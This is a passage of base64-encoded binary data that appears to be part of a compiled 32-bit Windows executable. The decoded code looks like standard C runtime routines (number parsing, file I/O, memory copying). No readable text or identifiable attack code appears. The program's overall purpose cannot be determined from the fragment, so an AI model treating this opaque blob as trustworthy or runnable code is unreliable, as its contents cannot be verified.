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QAAIuFROX//4uNMOX//wPBObU85f//iYU45f//D4wVBAAAg70g5f//AA+EzQAAAGoAjYU85f//UGoBjUX0UIuFKOX//4sAxkX0Df80B/8VbOBAAIXAD4TQAwAAg7085f//AQ+MzwMAAP+FMOX///+FOOX//+mDAAAAPAF0BDwCdSEPtzMzyWaD/goPlMFDQ4OFROX//wKJtUDl//+JjSDl//88AXQEPAJ1Uv+1QOX//+gRUwAAWWY7hUDl//8PhWgDAACDhTjl//8Cg70g5f//AHQpag1YUImFQOX//+jkUgAAWWY7hUDl//8PhTsDAAD/hTjl////hTDl//+LRRA5hUTl//8Pgvn9///pJwMAAIsOihP/hTjl//+IVA80iw6JRA846Q4DAAAzyYsGA8f2QASAD4S/AgAAi4U05f//iY1A5f//hNsPhcoAAACJhTzl//85TRAPhiADAADrBou1KOX//4uNPOX//4OlROX//wArjTTl//+NhUjl//87TRBzOYuVPOX///+FPOX//4oSQYD6CnUQ/4Uw5f//xgANQP+FROX//4gQQP+FROX//4G9ROX///8TAABywovYjYVI5f//K9hqAI2FLOX//1BTjYVI5f//UIsG/zQH/xVs4EAAhcAPhEICAACLhSzl//8BhTjl//87ww+MOgIAAIuFPOX//yuFNOX//ztFEA+CTP///+kgAgAAiYVE5f//gPsCD4XRAAAAOU0QD4ZNAgAA6waLtSjl//+LjUTl//+DpTzl//8AK4005f//jYVI5f//O00Qc0aLlUTl//+DhUTl//8CD7cSQUFmg/oKdRaDhTDl//8Cag1bZokYQECDhTzl//8Cg4U85f//AmaJEEBAgb085f///hMAAHK1i9iNhUjl//8r2GoAjYUs5f//UFONhUjl//9Qiwb/NAf/FWzgQACFwA+EYgEAAIuFLOX//wGFOOX//zvDD4xaAQAAi4VE5f//K4U05f//O0UQD4I/////6UABAAA5TRAPhnwBAACLjUTl//+DpTzl//8AK4005f//agKNhUj5//9eO00QczyLlUTl//8PtxIBtUTl//8DzmaD+gp1DmoNW2aJGAPGAbU85f//AbU85f//ZokQA8aBvTzl//+oBgAAcr8z9lZWaFUNAACNjfDr//9RjY1I+f//K8GZK8LR+FCLwVBWaOn9AAD/FXDgQACL2DveD4SXAAAAagCNhSzl//9Qi8MrxlCNhDXw6///UIuFKOX//4sA/zQH/xVs4EAAhcB0DAO1LOX//zvef8vrDP8VGOBAAImFQOX//zvef1yLhUTl//8rhTTl//+JhTjl//87RRAPggr////rP2oAjY0s5f//Uf91EP+1NOX///8w/xVs4EAAhcB0FYuFLOX//4OlQOX//wCJhTjl///rDP8VGOBAAImFQOX//4O9OOX//wB1bIO9QOX//wB0LWoFXjm1QOX//3UU6D7c///HAAkAAADoRtz//4kw6z//tUDl///oStz//1nrMYu1KOX//4sG9kQHBEB0D4uFNOX//4A4GnUEM8DrJOj+2///xwAcAAAA6Abc//+DIACDyP/rDIuFOOX//yuFMOX//19bi038M81e6BXN///Jw2oQaOD6QADo4+f//4tFCIP4/nUb6Mrb//+DIADor9v//8cACQAAAIPI/+mdAAAAM/87x3wIOwWIK0EAciHoodv//4k46Ifb///HAAkAAABXV1dXV+gP2///g8QU68mLyMH5BY0cjaArQQCL8IPmH8HmBosLD75MMQSD4QF0v1DolEkAAFmJffyLA/ZEMAQBdBb/dRD/dQz/dQjoLvj//4PEDIlF5OsW6CTb///HAAkAAADoLNv//4k4g03k/8dF/P7////oCQAAAItF5Ohj5///w/91COjeSQAAWcPMzMzMzMzMVYvsV1aLdQyLTRCLfQiLwYvRA8Y7/nYIO/gPgqQBAACB+QABAAByH4M9fCtBAAB0FldWg+cPg+YPO/5eX3UIXl9d6VtPAAD3xwMAAAB1FcHpAoPiA4P5CHIq86X/JJUETkAAkIvHugMAAACD6QRyDIPgAwPI/ySFGE1AAP8kjRROQACQ/ySNmE1AAJAoTUAAVE1AAHhNQAAj0YoGiAeKRgGIRwGKRgLB6QKIRwKDxgODxwOD+QhyzPOl/ySVBE5AAI1JACPRigaIB4pGAcHpAohHAYPGAoPHAoP5CHKm86X/JJUETkAAkCPRigaIB4PGAcHpAoPHAYP5CHKI86X/JJUETkAAjUkA+01AAOhNQADgTUAA2E1AANBNQADITUAAwE1AALhNQACLRI7kiUSP5ItEjuiJRI/oi0SO7IlEj+yLRI7wiUSP8ItEjvSJRI/0i0SO+IlEj/iLRI78iU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